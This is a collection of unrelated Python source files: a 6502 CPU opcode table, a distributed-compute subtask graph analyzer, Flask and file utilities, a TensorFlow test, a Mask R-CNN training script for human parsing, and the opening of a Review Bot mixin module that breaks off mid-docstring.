# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0xb0, 'BCS', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0x90, 'BCC', 2, 2, AddressingMode.NoneAddressing),
# /*(+1 if branch succeeds +2 if to a new page)*/
OpCode(0x10, 'BPL', 2, 2, AddressingMode.NoneAddressing),
# ---
OpCode(0x24, 'BIT', 2, 3, AddressingMode.ZeroPage),
OpCode(0x2c, 'BIT', 3, 4, AddressingMode.Absolute),
# --- Stores, Loads
OpCode(0xa9, 'LDA', 2, 2, AddressingMode.Immediate),
OpCode(0xa5, 'LDA', 2, 3, AddressingMode.ZeroPage),
OpCode(0xb5, 'LDA', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0xad, 'LDA', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0xbd, 'LDA', 3, 4, AddressingMode.Absolute_X),
# /*+1 if page crossed*/
OpCode(0xb9, 'LDA', 3, 4, AddressingMode.Absolute_Y),
OpCode(0xa1, 'LDA', 2, 6, AddressingMode.Indirect_X),
# /*+1 if page crossed*/
OpCode(0xb1, 'LDA', 2, 5, AddressingMode.Indirect_Y),
# ---
OpCode(0xa2, 'LDX', 2, 2, AddressingMode.Immediate),
OpCode(0xa6, 'LDX', 2, 3, AddressingMode.ZeroPage),
OpCode(0xb6, 'LDX', 2, 4, AddressingMode.ZeroPage_Y),
OpCode(0xae, 'LDX', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0xbe, 'LDX', 3, 4, AddressingMode.Absolute_Y),
# ---
OpCode(0xa0, 'LDY', 2, 2, AddressingMode.Immediate),
OpCode(0xa4, 'LDY', 2, 3, AddressingMode.ZeroPage),
OpCode(0xb4, 'LDY', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0xac, 'LDY', 3, 4, AddressingMode.Absolute),
# /*+1 if page crossed*/
OpCode(0xbc, 'LDY', 3, 4, AddressingMode.Absolute_X),
# ---
OpCode(0x85, 'STA', 2, 3, AddressingMode.ZeroPage),
OpCode(0x95, 'STA', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x8d, 'STA', 3, 4, AddressingMode.Absolute),
OpCode(0x9d, 'STA', 3, 5, AddressingMode.Absolute_X),
OpCode(0x99, 'STA', 3, 5, AddressingMode.Absolute_Y),
OpCode(0x81, 'STA', 2, 6, AddressingMode.Indirect_X),
OpCode(0x91, 'STA', 2, 6, AddressingMode.Indirect_Y),
# ---
OpCode(0x86, 'STX', 2, 3, AddressingMode.ZeroPage),
OpCode(0x96, 'STX', 2, 4, AddressingMode.ZeroPage_Y),
OpCode(0x8e, 'STX', 3, 4, AddressingMode.Absolute),
# ---
OpCode(0x84, 'STY', 2, 3, AddressingMode.ZeroPage),
OpCode(0x94, 'STY', 2, 4, AddressingMode.ZeroPage_X),
OpCode(0x8c, 'STY', 3, 4, AddressingMode.Absolute),
# --- Flags clear
OpCode(0xD8, 'CLD', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x58, 'CLI', 1, 2, AddressingMode.NoneAddressing),
OpCode(0xb8, 'CLV', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x18, 'CLC', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x38, 'SEC', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x78, 'SEI', 1, 2, AddressingMode.NoneAddressing),
OpCode(0xf8, 'SED', 1, 2, AddressingMode.NoneAddressing),
# ---
OpCode(0xaa, 'TAX', 1, 2, AddressingMode.NoneAddressing),
OpCode(0xa8, 'TAY', 1, 2, AddressingMode.NoneAddressing),
OpCode(0xba, 'TSX', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x8a, 'TXA', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x9a, 'TXS', 1, 2, AddressingMode.NoneAddressing),
OpCode(0x98, 'TYA', 1, 2, AddressingMode.NoneAddressing),
# --- Stack
OpCode(0x48, 'PHA', 1, 3, AddressingMode.NoneAddressing),
OpCode(0x68, 'PLA', 1, 4, AddressingMode.NoneAddressing),
OpCode(0x08, 'PHP', 1, 3, AddressingMode.NoneAddressing),
OpCode(0x28, 'PLP', 1, 4, AddressingMode.NoneAddressing),
]
OPCODES_MAP = {}
for cpuop in CPU_OPS_CODES:
OPCODES_MAP.update({cpuop.code: cpuop})
if __name__ == '__main__':
pass
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import logging
from collections import deque, defaultdict
from typing import Dict, List, Tuple, Type, Union
from ....config import Config
from ....core import ChunkGraph, ChunkType, enter_mode
from ....core.operand import (
Fetch,
VirtualOperand,
LogicKeyGenerator,
MapReduceOperand,
OperandStage,
)
from ....resource import Resource
from ....typing import BandType, OperandType
from ....utils import build_fetch, tokenize
from ...subtask import SubtaskGraph, Subtask
from ..core import Task, new_task_id
from .assigner import AbstractGraphAssigner, GraphAssigner
from .fusion import Coloring
logger = logging.getLogger(__name__)
def need_reassign_worker(op: OperandType) -> bool:
# NOTE(qinxuye): special process for reducer
# We'd better set reducer op's stage to reduce, however,
# in many case, we copy a reducer op from tileable op,
# then set stage as reducer one,
# it would be quite nasty to take over the __setattr__ and
# make reassign_worker True etc.
return op.reassign_worker or (
isinstance(op, MapReduceOperand) and op.stage == OperandStage.reduce
)
class GraphAnalyzer:
def __init__(
self,
chunk_graph: ChunkGraph,
band_resource: Dict[BandType, Resource],
task: Task,
config: Config,
chunk_to_subtasks: Dict[ChunkType, Subtask],
graph_assigner_cls: Type[AbstractGraphAssigner] = None,
stage_id: str = None,
):
self._chunk_graph = chunk_graph
self._band_resource = band_resource
self._task = task
self._stage_id = stage_id
self._config = config
self._fuse_enabled = task.fuse_enabled
self._extra_config = task.extra_config
self._chunk_to_subtasks = chunk_to_subtasks
if graph_assigner_cls is None:
graph_assigner_cls = GraphAssigner
self._graph_assigner_cls = graph_assigner_cls
self._chunk_to_copied = dict()
self._logic_key_generator = LogicKeyGenerator()
@classmethod
def _iter_start_ops(cls, chunk_graph: ChunkGraph):
visited = set()
op_keys = set()
start_chunks = deque(chunk_graph.iter_indep())
stack = deque([start_chunks.popleft()])
while stack:
chunk = stack.popleft()
if chunk not in visited:
inp_chunks = chunk_graph.predecessors(chunk)
if not inp_chunks or all(
inp_chunk in visited for inp_chunk in inp_chunks
):
if len(inp_chunks) == 0:
op_key = chunk.op.key
if op_key not in op_keys:
op_keys.add(op_key)
yield chunk.op
visited.add(chunk)
stack.extend(c for c in chunk_graph[chunk] if c not in visited)
else:
stack.appendleft(chunk)
stack.extendleft(
reversed(
[
c
for c in chunk_graph.predecessors(chunk)
if c not in visited
]
)
)
if not stack and start_chunks:
stack.appendleft(start_chunks.popleft())
@classmethod
def _gen_input_chunks(
cls,
inp_chunks: List[ChunkType],
chunk_to_fetch_chunk: Dict[ChunkType, ChunkType],
) -> List[ChunkType]:
# gen fetch chunks for input chunks
inp_fetch_chunks = []
for inp_chunk in inp_chunks:
if inp_chunk in chunk_to_fetch_chunk:
inp_fetch_chunks.append(chunk_to_fetch_chunk[inp_chunk])
elif isinstance(inp_chunk.op, Fetch):
chunk_to_fetch_chunk[inp_chunk] = inp_chunk
inp_fetch_chunks.append(inp_chunk)
else:
fetch_chunk = build_fetch(inp_chunk).data
chunk_to_fetch_chunk[inp_chunk] = fetch_chunk
inp_fetch_chunks.append(fetch_chunk)
return inp_fetch_chunks
@staticmethod
def _to_band(band_or_worker: Union[BandType, str]) -> BandType:
if isinstance(band_or_worker, tuple) and len(band_or_worker) == 2:
# band already
return band_or_worker
else:
return band_or_worker, "numa-0"
def _gen_subtask_info(
self,
chunks: List[ChunkType],
chunk_to_subtask: Dict[ChunkType, Subtask],
chunk_to_bands: Dict[ChunkType, BandType],
chunk_to_fetch_chunk: Dict[ChunkType, ChunkType],
) -> Tuple[Subtask, List[Subtask]]:
# gen subtask and its input subtasks
final_result_chunks_set = set(self._chunk_graph.result_chunks)
chunks_set = set(chunks)
result_chunks = []
result_chunks_set = set()
chunk_graph = ChunkGraph(result_chunks)
out_of_scope_chunks = []
chunk_to_copied = self._chunk_to_copied
update_meta_chunks = []
# subtask properties
band = None
is_virtual = None
retryable = True
chunk_priority = None
expect_worker = None
bands_specified = None
processed = set()
for chunk in chunks:
if chunk in processed:
continue
if expect_worker is None:
expect_worker = chunk.op.expect_worker
bands_specified = expect_worker is not None
else: # pragma: no cover
assert (
chunk.op.expect_worker is None
or expect_worker == chunk.op.expect_worker
), (
f"expect_worker {chunk.op.expect_worker} conflicts with chunks that have same color: "
f"{expect_worker}"
)
# process band
chunk_band = chunk_to_bands.get(chunk)
if chunk_band is not None:
assert (
band is None or band == chunk_band
), "band conflicts with chunks that have same color"
band = chunk_band
# process is_virtual
if isinstance(chunk.op, VirtualOperand):
assert is_virtual is None, "only 1 virtual operand can exist"
is_virtual = True
else:
is_virtual = False
# process retryable
if not chunk.op.retryable:
retryable = False
# process priority
if chunk.op.priority is not None:
assert (
chunk_priority is None or chunk_priority == chunk.op.priority
), "priority conflicts with chunks that have same color"
chunk_priority = chunk.op.priority
# process input chunks
inp_chunks = []
build_fetch_index_to_chunks = dict()
for i, inp_chunk in enumerate(chunk.inputs):
if inp_chunk in chunks_set:
inp_chunks.append(chunk_to_copied[inp_chunk])
else:
build_fetch_index_to_chunks[i] = inp_chunk
inp_chunks.append(None)
if not isinstance(inp_chunk.op, Fetch):
out_of_scope_chunks.append(inp_chunk)
fetch_chunks = self._gen_input_chunks(
list(build_fetch_index_to_chunks.values()), chunk_to_fetch_chunk
)
for i, fetch_chunk in zip(build_fetch_index_to_chunks, fetch_chunks):
inp_chunks[i] = fetch_chunk
copied_op = chunk.op.copy()
copied_op._key = chunk.op.key
out_chunks = [
c.data
for c in copied_op.new_chunks(
inp_chunks, kws=[c.params.copy() for c in chunk.op.outputs]
)
]
for src_chunk, out_chunk in zip(chunk.op.outputs, out_chunks):
processed.add(src_chunk)
out_chunk._key = src_chunk.key
chunk_graph.add_node(out_chunk)
# cannot be copied twice
assert src_chunk not in chunk_to_copied
chunk_to_copied[src_chunk] = out_chunk
if src_chunk in final_result_chunks_set:
if out_chunk not in result_chunks_set:
# add to result chunks
result_chunks.append(out_chunk)
# chunk is in the result chunks of full chunk graph
# meta need to be updated
update_meta_chunks.append(out_chunk)
result_chunks_set.add(out_chunk)
if not is_virtual:
# skip adding fetch chunk to chunk graph when op is virtual operand
for c in inp_chunks:
if c not in chunk_graph:
chunk_graph.add_node(c)
chunk_graph.add_edge(c, out_chunk)
# add chunks with no successors into result chunks
result_chunks.extend(
c
for c in chunk_graph.iter_indep(reverse=True)
if c not in result_chunks_set
)
expect_bands = (
[self._to_band(expect_worker)]
if bands_specified
else ([band] if band is not None else None)
)
# calculate priority
if out_of_scope_chunks:
inp_subtasks = []
for out_of_scope_chunk in out_of_scope_chunks:
copied_out_of_scope_chunk = chunk_to_copied[out_of_scope_chunk]
inp_subtask = chunk_to_subtask[out_of_scope_chunk]
if (
copied_out_of_scope_chunk
not in inp_subtask.chunk_graph.result_chunks
):
# make sure the chunk that out of scope
# is in the input subtask's results,
# or the meta may be lost
inp_subtask.chunk_graph.result_chunks.append(
copied_out_of_scope_chunk
)
inp_subtasks.append(inp_subtask)
depth = max(st.priority[0] for st in inp_subtasks) + 1
else:
inp_subtasks = []
depth = 0
priority = (depth, chunk_priority or 0)
subtask = Subtask(
subtask_id=new_task_id(),
stage_id=self._stage_id,
logic_key=self._gen_logic_key(chunks),
session_id=self._task.session_id,
task_id=self._task.task_id,
chunk_graph=chunk_graph,
expect_bands=expect_bands,
bands_specified=bands_specified,
virtual=is_virtual,
priority=priority,
retryable=retryable,
update_meta_chunks=update_meta_chunks,
extra_config=self._extra_config,
)
return subtask, inp_subtasks
def _gen_logic_key(self, chunks: List[ChunkType]):
return tokenize(
*[self._logic_key_generator.get_logic_key(chunk.op) for chunk in chunks]
)
@enter_mode(build=True)
def gen_subtask_graph(
self, op_to_bands: Dict[str, BandType] = None
) -> SubtaskGraph:
"""
Analyze chunk graph and generate subtask graph.
Returns
-------
subtask_graph: SubtaskGraph
Subtask graph.
"""
# reassign worker when specified reassign_worker = True
# or it's a reducer operands
reassign_worker_ops = [
chunk.op for chunk in self._chunk_graph if need_reassign_worker(chunk.op)
]
start_ops = (
list(self._iter_start_ops(self._chunk_graph))
if len(self._chunk_graph) > 0
else []
)
# assign start chunks
to_assign_ops = start_ops + reassign_worker_ops
assigner = self._graph_assigner_cls(
self._chunk_graph, to_assign_ops, self._band_resource
)
# assign expect workers
cur_assigns = {
op.key: self._to_band(op.expect_worker)
for op in start_ops
if op.expect_worker is not None
}
if op_to_bands:
cur_assigns.update(op_to_bands)
logger.debug(
"Start to assign %s start chunks for task %s",
len(start_ops),
self._task.task_id,
)
chunk_to_bands = assigner.assign(cur_assigns=cur_assigns)
logger.debug(
"Assigned %s start chunks for task %s", len(start_ops), self._task.task_id
)
# assign expect workers for those specified with `expect_worker`
# skip `start_ops`, which have been assigned before
start_ops_set = set(start_ops)
for chunk in self._chunk_graph:
if chunk not in start_ops_set and chunk.op.expect_worker is not None:
chunk_to_bands[chunk] = self._to_band(chunk.op.expect_worker)
# color nodes
if self._fuse_enabled:
logger.debug("Start to fuse chunks for task %s", self._task.task_id)
# sort start chunks in coloring as start_ops
op_key_to_chunks = defaultdict(list)
for chunk in self._chunk_graph:
op_key_to_chunks[chunk.op.key].append(chunk)
init_chunk_to_bands = dict()
for start_op in start_ops:
for start_chunk in op_key_to_chunks[start_op.key]:
init_chunk_to_bands[start_chunk] = chunk_to_bands[start_chunk]
coloring = Coloring(
self._chunk_graph,
list(self._band_resource),
init_chunk_to_bands,
initial_same_color_num=getattr(
self._config, "initial_same_color_num", None
),
as_broadcaster_successor_num=getattr(
self._config, "as_broadcaster_successor_num", None
),
)
chunk_to_colors = coloring.color()
else:
# if not fuse enabled, color all chunks with different colors
op_to_colors = dict()
chunk_to_colors = dict()
color_gen = itertools.count()
for c in self._chunk_graph.topological_iter():
if c.op not in op_to_colors:
chunk_to_colors[c] = op_to_colors[c.op] = next(color_gen)
else:
chunk_to_colors[c] = op_to_colors[c.op]
color_to_chunks = defaultdict(list)
for chunk, color in chunk_to_colors.items():
if not isinstance(chunk.op, Fetch):
color_to_chunks[color].append(chunk)
# gen subtask graph
subtask_graph = SubtaskGraph()
chunk_to_fetch_chunk = dict()
chunk_to_subtask = self._chunk_to_subtasks
# states
visited = set()
logic_key_to_subtasks = defaultdict(list)
for chunk in self._chunk_graph.topological_iter():
if chunk in visited or isinstance(chunk.op, Fetch):
# skip fetch chunk
continue
color = chunk_to_colors[chunk]
same_color_chunks = color_to_chunks[color]
if all(isinstance(c.op, Fetch) for c in same_color_chunks):
# all fetch ops, no need to gen subtask
continue
subtask, inp_subtasks = self._gen_subtask_info(
same_color_chunks,
chunk_to_subtask,
chunk_to_bands,
chunk_to_fetch_chunk,
)
subtask_graph.add_node(subtask)
logic_key_to_subtasks[subtask.logic_key].append(subtask)
for inp_subtask in inp_subtasks:
subtask_graph.add_edge(inp_subtask, subtask)
for c in same_color_chunks:
chunk_to_subtask[c] = subtask
visited.update(same_color_chunks)
for subtasks in logic_key_to_subtasks.values():
for logic_index, subtask in enumerate(subtasks):
subtask.logic_index = logic_index
subtask.logic_parallelism = len(subtasks)
return subtask_graph
|
# -*- coding: utf-8 -*-
"""
extensions.py
:copyright: (c) 2017 by Joe Paul.
:license: see LICENSE for details.
"""
from flask_wtf.csrf import CSRFProtect
csrf_protect = CSRFProtect()
|
"""
Utils related to different file operations
Creation Date: April 2020
Creator: Mafuba09
"""
# imports...
import os
import time
EXPERIMENTS_FOLDER = 'experiments'
def get_experiment_dir(script_file_path: str, sub_name: str = '') -> str:
"""
Creates a result structure in the main directory for the corresponding experiment. For traceability the name is
derived from the task name f.e. cifar for cifar10.py and adds the current time stamp to distinguish among multiple
experiment runs.
:param script_file_path: path of the calling script, used to derive task name
:param sub_name: optional string to describe experiment
:return: experiment directory
"""
tm_struct = time.gmtime() # gets current time
script_filename = os.path.splitext(os.path.split(script_file_path)[-1])[0] # removes .py from calling script
# combine time-string and script name into experiment name
out_dir = '.' + os.sep + EXPERIMENTS_FOLDER \
+ os.sep + sub_name + '{}_{}{:02d}{:02d}_{:02d}{:02d}{:02d}'.format(script_filename, tm_struct.tm_year,
tm_struct.tm_mon, tm_struct.tm_mday,
tm_struct.tm_hour, tm_struct.tm_min,
tm_struct.tm_sec)
if not os.path.exists(out_dir): # if directory is not existing
os.makedirs(out_dir) # create output directory
return out_dir # return path to output directory
def get_latest_experiment_dir(file_path=None) -> str:
"""
Get latest experiment folder.
:param file_path: Custom filepath to folder with *.h5 file
:return: file path to latest experiment directory
"""
# Check if experiment folder exists
experiment_folder = os.path.join('.', EXPERIMENTS_FOLDER)
if file_path is not None and os.path.exists(file_path):
return file_path
print('Checking experiment folder!')
if os.path.exists(experiment_folder):
experiment_dirs = os.listdir(experiment_folder)
experiment_dirs.sort(reverse=True) # Sort highest to lowest
if len(experiment_dirs) <= 0:
return ''
else:
return ''
return '.' + os.sep + EXPERIMENTS_FOLDER + os.sep + str(experiment_dirs[0])
|
path = '.\\08-File-Handling-Lab-Resources\\File Opener\\text.txt'
try:
file = open(path, 'r')
print('File found')
except FileNotFoundError:
print('File not found')
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged.rank op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.framework import test_util
from tensorflow.python.ops.ragged import ragged_array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_test_util
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class RaggedRankOpTest(ragged_test_util.RaggedTensorTestCase,
parameterized.TestCase):
@parameterized.parameters([
# Rank 0
dict(
test_input=1,
expected_rank=0,
),
# Rank 1
dict(
test_input=[1],
expected_rank=1,
),
dict(
test_input=[1, 2, 3, 4],
expected_rank=1,
),
# Rank 2
dict(
test_input=[[1], [2], [3]],
expected_rank=2,
),
# Rank 3
dict(
test_input=[[[1], [2, 3]], [[4], [5, 6, 7]]],
expected_rank=3,
),
# Rank 3, ragged_rank=2
dict(
test_input=[[[1], [2, 3], [10, 20]],
[[4], [5, 6, 7]]],
expected_rank=3,
ragged_rank=2,
),
# Rank 4, ragged_rank=3 with dimensions: {2, (1, 2), (2), (1, 2)}
dict(
test_input=[[[[1], [2]]],
[[[3, 4], [5, 6]], [[7, 8], [9, 10]]]],
expected_rank=4,
),
# Rank 4, ragged_rank=2 with dimensions: {2, (1, 2), (1, 2), 2}
dict(
test_input=[
[[[1, 2]]],
[[[5, 6], [7, 8]],
[[9, 10], [11, 12]]]],
expected_rank=4,
ragged_rank=2,
),
])
def testRaggedRank(self, test_input, expected_rank, ragged_rank=None):
test_input = ragged_factory_ops.constant(
test_input, ragged_rank=ragged_rank)
self.assertAllEqual(ragged_array_ops.rank(
test_input), expected_rank)
if __name__ == '__main__':
googletest.main()
|
"""
Mask R-CNN
Train on the LIP dataset
------------------------------------------------------------
Usage: import the module (see Jupyter notebooks for examples), or run from
the command line as such:
# Train a new model starting from pre-trained COCO weights
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=coco
# Resume training a model that you had trained earlier
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=last
# Train a new model starting from ImageNet weights
python3 humanparsing.py train --dataset=/path/to/humanparsing/dataset --weights=imagenet
"""
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
import cv2 as cv
import imgaug
import tensorflow as tf
# os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
############################################################
# Configurations
############################################################
class HumanConfig(Config):
"""Configuration for training on the LIP dataset.
Derives from the base Config class and overrides some values.
"""
# Give the configuration a recognizable name
NAME = "human"
IMAGES_PER_GPU = 1
GPU_COUNT = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 19 # 1 Background + 19 Parsing Catagories
# # Reduce training ROIs per image because the images are small and have
# # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 33
# Number of training steps per epochc
STEPS_PER_EPOCH = 100
# Skip detections with < 95% confidence
DETECTION_MIN_CONFIDENCE = 0.95
############################################################
# Dataset
############################################################
class HumanDataset(utils.Dataset):
def load_human(self, dataset_dir, subset):
"""Load a subset of the LIP dataset.
dataset_dir: Root directory of the dataset.
subset: Subset to load: train or val
"""
# Add classes. We have only one class to add.
self.add_class("human", 1, "Hat")
self.add_class("human", 2, "Hair")
self.add_class("human", 3, "Glove")
self.add_class("human", 4, "Sunglasses")
self.add_class("human", 5, "UpperCloths")
self.add_class("human", 6, "Dress")
self.add_class("human", 7, "Coat")
self.add_class("human", 8, "Socks")
self.add_class("human", 9, "Pants")
self.add_class("human", 10, "Jumpsuits")
self.add_class("human", 11, "Scarf")
self.add_class("human", 12, "Skirt")
self.add_class("human", 13, "Face")
self.add_class("human", 14, "Left-arm")
self.add_class("human", 15, "Right-arm")
self.add_class("human", 16, "Left-leg")
self.add_class("human", 17, "Right-leg")
self.add_class("human", 18, "Left-shoe")
self.add_class("human", 19, "Right-shoe")
# Train or validation dataset?
assert subset in ["train", "val"]
dataset_dir = os.path.join(dataset_dir, subset)
dataset_list = os.path.join(dataset_dir, "{}_id.txt".format(subset))
f = open(dataset_list, 'r')
f = f.read().splitlines()
f = self.check_seg(f, dataset_dir, subset)
for img in f:
# Get Image Information
image_path = os.path.join(dataset_dir, "{}_images/{}.jpg".format(subset,img))
self.add_image(
"human",
image_id=img,
path = image_path,
subset = subset)
def load_mask(self, image_id):
"""Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a human dataset image, delegate to parent class.
info = self.image_info[image_id]
seg_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])),
"{}_segmentations".format(info['subset']))
# Get Image Segmentation
img_seg = cv.imread(os.path.join(seg_dir, info['id'] +".png"))
img_seg = cv.cvtColor(img_seg, cv.COLOR_BGR2GRAY)
classes_seg = np.unique(img_seg)
mask = []
class_id = []
for i in range(len(classes_seg)):
if i == 0:
continue
img_seg2 = img_seg.copy()
img_seg2[img_seg2 != classes_seg[i]] = 0
mask.append(img_seg2.astype(np.bool))
class_id.append(classes_seg[i])
if class_id:
mask = np.stack(mask, axis=2).astype(np.bool)
class_id = np.array(class_id, dtype=np.int32)
return mask, class_id
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "human":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
def check_seg(self, data_list, dataset_dir, subset):
seg_dir = os.path.join(dataset_dir, "{}_segmentations".format(subset))
filtered_list = []
for img_id in data_list:
img_seg = cv.imread(os.path.join(seg_dir, img_id +".png"))
img_seg = cv.cvtColor(img_seg, cv.COLOR_BGR2GRAY)
if len(np.unique(img_seg)) != 1:
filtered_list.append(img_id)
return filtered_list
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = HumanDataset()
dataset_train.load_human(args.dataset, "train")
dataset_train.prepare()
# Validation dataset
dataset_val = HumanDataset()
dataset_val.load_human(args.dataset, "val")
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights.
augmentation = imgaug.augmenters.Fliplr(0.5)
print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=40,
layers='heads',
augmentation=augmentation)
# Fine tune Resnet4 and up layers
# Passing layers="all" trains all layers. You can also
# pass a regular expression to select which layers to
# train by name pattern.
print("Fine Tune Resnet4 and up")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=120,
layers="4+",
augmentation=augmentation)
print("Fine Tune all layers")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE / 10,
epochs=160,
layers="all",
augmentation=augmentation)
############################################################
# Training
############################################################
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Train Mask R-CNN to detect human parsing.')
parser.add_argument("command",
metavar="<command>",
help="'train' or 'splash'")
parser.add_argument('--dataset', required=False,
metavar="/path/to/human/dataset/",
help='Directory of the human dataset')
parser.add_argument('--weights', required=True,
metavar="/path/to/weights.h5",
help="Path to weights .h5 file or 'coco'")
parser.add_argument('--logs', required=False,
default=DEFAULT_LOGS_DIR,
metavar="/path/to/logs/",
help='Logs and checkpoints directory (default=logs/)')
args = parser.parse_args()
# Validate arguments
if args.command == "train":
assert args.dataset, "Argument --dataset is required for training"
elif args.command == "splash":
assert args.image or args.video,\
"Provide --image or --video to apply color splash"
print("Weights: ", args.weights)
print("Dataset: ", args.dataset)
print("Logs: ", args.logs)
# Configurations
if args.command == "train":
config = HumanConfig()
else:
class InferenceConfig(HumanConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# Create model
if args.command == "train":
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=args.logs)
else:
model = modellib.MaskRCNN(mode="inference", config=config,
model_dir=args.logs)
# Select weights file to load
if args.weights.lower() == "coco":
weights_path = COCO_WEIGHTS_PATH
# Download weights file
if not os.path.exists(weights_path):
utils.download_trained_weights(weights_path)
elif args.weights.lower() == "last":
# Find last trained weights
weights_path = model.find_last()
elif args.weights.lower() == "imagenet":
# Start from ImageNet trained weights
weights_path = model.get_imagenet_weights()
else:
weights_path = args.weights
# Load weights
print("Loading weights ", weights_path)
if args.weights.lower() == "coco":
# Exclude the last layers because they require a matching
# number of classes
model.load_weights(weights_path, by_name=True, exclude=[
"mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
else:
model.load_weights(weights_path, by_name=True)
# Train or evaluate
if args.command == "train":
train(model)
else:
print("'{}' is not recognized. "
"Use 'train'".format(args.command))
|
"""Tests for privacy.util.logging"""
from privacy.util import logging
def test_mock_logger():
class MockLogger(logging.LoggingClass):
pass
assert isinstance(MockLogger().log, logging.logging.Logger)
|
"""Useful mixins for code checking tools.
Version Added:
3.0
"""
from __future__ import unicode_literals
import os
import re
from reviewbot.config import config
from reviewbot.utils.filesystem import chdir, ensure_dirs_exist
from reviewbot.utils.process import execute
from reviewbot.utils.text import split_comma_separated
# Python 3.4+ includes glob.escape, but older versions do not. Optimistically,
# we'll use glob.escape, and we'll fall back on a custom implementation.
try:
from glob import escape as glob_escape
except ImportError:
_glob_escape_pattern = re.compile(r'([*?[])')
def glob_escape(path):
drive, path = os.path.split(path)
return '%s%s' % (drive, _glob_escape_pattern.sub(r'[\1]', path))
class FilePatternsFromSettingMixin(object):
"""Mixin to set file patterns based on a configured tool setting.
Subclasses can base file patterns off either a setting representing
a comma-separated list of file patterns, or a setting representing a
comma-separated list of file extensions. If both are provided, both will
be checked, with the file patterns taking precedence over file extensions.
If neither are provided by the user, the default list of file patterns
set by the subclass (if any) will be used.
Version Added:
3.0
"""
#: The name of a tool setting for a comma-separated list of extensions.
#:
#: Type:
#: unicode
file_extensions_setting = None
#: The name of a tool setting for a comma-separated list of patterns.
#:
#: Type:
#: unicode
file_patterns_setting = None
#: Whether to include default file patterns in the resulting list.
#:
#: Type:
#: boolean
include_default_file_patterns = True
def __init__(self, **kwargs):
"""Initialize the tool.
Args:
**kwargs (dict):
Keyword arguments for the tool.
"""
super(FilePatternsFromSettingMixin, self).__init__(**kwargs)
settings = self.settings
file_patterns = None
if self.file_patterns_setting:
value = settings.get(self.file_patterns_setting, '').strip()
if value:
file_patterns = split_comma_separated(value)
if not file_patterns and self.file_extensions_setting:
value = settings.get(self.file_extensions_setting, '').strip()
file_patterns = [
'*.%s' % glob_escape(ext.lstrip('.'))
for ext in split_comma_separated(value)
]
if file_patterns:
if self.include_default_file_patterns and self.file_patterns:
file_patterns += self.file_patterns
self.file_patterns = [
file_pattern
for file_pattern in sorted(set(file_patterns))
if file_pattern
]
class FullRepositoryToolMixin(object):
"""Mixin for tools that need access to the entire repository.
This will take care of checking out a copy of the repository and applying
patches from the diff being reviewed.
Version Added:
3.0:
This replaced the legacy :py:class:`reviewbot.tools.RepositoryTool`.
"""
working_directory_required = True
def execute(self, review, repository=None, base_commit_id=None, **kwargs):
"""Perform a review using the tool.
Args:
review (reviewbot.processing.review.Review):
